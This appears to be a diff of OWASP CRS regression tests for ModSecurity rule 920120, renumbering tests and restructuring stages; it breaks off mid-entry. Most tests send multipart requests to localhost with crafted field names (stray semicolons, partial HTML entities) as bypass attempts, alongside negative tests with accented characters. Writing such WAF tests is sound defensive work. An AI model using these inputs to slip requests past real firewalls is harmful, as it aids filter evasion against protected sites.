modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: en-us,en;q=0.5 - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.1 - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="fi;le"; filename="test" - Content-Type: application/octet-stream - - Rotem & Ayala - - -----------------------------265001916915724 - Content-Disposition: form-data; name="name" - - tt2 - -----------------------------265001916915724 - Content-Disposition: form-data; name="B1" - - Submit - -----------------------------265001916915724-- - output: - log_contains: id "920120" - - test_title: 920120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: en-us,en;q=0.5 + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.1 + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="fi;le"; filename="test" + Content-Type: application/octet-stream + + Rotem & Ayala + + -----------------------------265001916915724 + Content-Disposition: form-data; name="name" + + tt2 + -----------------------------265001916915724 + Content-Disposition: form-data; name="B1" + + Submit + -----------------------------265001916915724-- + output: + log_contains: id "920120" + - test_id: 4 desc: Attempted multipart/form-data bypass (920120). Negative test. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="file"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="file"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-5 + - test_id: 5 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=";zzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=";zzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-6 + - test_id: 6 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="amp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="amp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-7 + - test_id: 7 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-8 + - test_id: 8 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="p;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="p;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-9 + - test_id: 9 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zamp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zamp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-10 + - test_id: 10 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zmp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zmp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-11 + - test_id: 11 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-12 + - test_id: 12 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Z;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Z;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-13 + - test_id: 13 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-14 + - test_id: 14 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-15 + - test_id: 15 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-16 + - test_id: 16 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-17 + - test_id: 17 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mZ;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mZ;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-18 + - test_id: 18 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-19 + - test_id: 19 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouy]uml;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-20 + - test_id: 20 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-21 + - test_id: 21 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-22 + - test_id: 22 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-23 + - test_id: 23 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-24 + - test_id: 24 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-25 + - test_id: 25 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiou]grave;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-26 + - test_id: 26 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-27 + - test_id: 27 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-28 + - test_id: 28 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-29 + - test_id: 29 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of 